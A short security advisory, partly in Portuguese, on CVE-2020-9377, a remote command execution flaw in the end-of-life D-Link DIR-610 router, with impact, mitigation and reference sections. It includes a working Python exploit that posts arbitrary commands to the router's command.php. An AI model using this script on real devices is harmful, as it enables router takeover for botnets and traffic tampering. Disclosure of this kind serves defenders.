Heitor Gouvêa
CVE-2020-9377 - Remote Code Execution (RCE) on D-LINK 610 Router
Summary
DIR-610 é um roteador que foi desenvolvido e vendido pela DLINK e foi distribuído na América Central e na América do Sul.
Description
Exploit
#!/usr/bin/python
import os
import sys
import urllib2
import threading
import time
def main(host, port, uid, command):
request = urllib2.Request('http://%s:%s/command.php' % (host, port), 'cmd=%s' % command, { 'Cookie': 'uid=%s' % uid })
print urllib2.urlopen(request).read()
if __name__ == '__main__':
[host, port, uid, command] = sys.argv[1:5]
main(host, port, uid, command)
Impact
A malicious agent can execute commands on the router system remotely and take control of it and subvert such router to work/perform actions that it wants, using the same for botnets, traffic infection actions and other possibilities.
Mitigation
While D-Link is aware of vulnerabilities involving DIR-610, these products have reached End of Life (EoL)/End of Support (EoS) and there is no extended support or development for them. D-Link will not be able to resolve device or firmware issues as all development and customer support has ceased.
The DIR-610 Rev. Ax reached its End of Support Date in 2014, it is no longer supported and firmware development has stopped, all consumers still using the product should retire it and immediately replace the device.
Conclusion
References
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9377
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
- https://www.dlink.com.br/produto/dir-610/
- https://owasp.org/www-community/attacks/Command_Injection
- https://portswigger.net/web-security/os-command-injection